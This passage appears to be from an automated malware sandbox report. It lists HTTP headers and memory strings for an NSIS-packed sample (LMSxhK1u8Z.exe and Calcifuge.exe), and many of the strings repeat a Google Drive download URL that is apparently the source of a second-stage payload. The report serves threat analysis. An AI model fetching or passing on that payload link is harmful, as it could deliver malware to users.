Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7CoJK4ARR12QuzzmIwJdqRgxRlzbs6XxRMxU4IKj4i5KetpINl-WgXqQ0qML_G75Mddp1txTAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:51 GMTContent-Security-Policy: script-src 'nonce-T7LT2ZQehJxj0mJvCe6Uhw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: powershell.exe, 00000001.00000002.1999999428.0000000008A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
      Source: powershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
      Source: LMSxhK1u8Z.exe, Calcifuge.exe.1.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Calcifuge.exe, 00000006.00000001.1984960895.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Calcifuge.exe, 00000006.00000001.1984960895.00000000005F2000.00000020.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=d
      Source: Calcifuge.exe, 00000006.00000003.2514842468.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2846865249.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2779106940.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801689509.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/2.
      Source: Calcifuge.exe, 00000006.00000003.2674274316.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2640013882.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2662875760.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/C
      Source: Calcifuge.exe, 00000006.00000003.2767990267.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/J.
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2880880177.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000002.2918854097.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2846865249.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2377017569.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2858542036.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2767990267.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2916937010.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2779106940.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download(
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2640013882.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2662875760.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2698191444.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2617552588.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2756335026.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2674274316.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2767990267.00000000023B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download0
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2880880177.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000002.2918854097.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2846865249.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2858542036.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2916937010.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801689509.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadL
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2880880177.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloade
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2880880177.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000002.2918854097.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadel
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2880880177.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadider
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2880880177.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000002.2918854097.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2617552588.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2571402123.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2858542036.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2916937010.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2548701285.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadider&
      Source: Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457734111.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2571402123.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2503130227.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2548701285.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514842468.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadt
      Source: Calcifuge.exe, 00000006.00000003.2423875201.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/R.
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 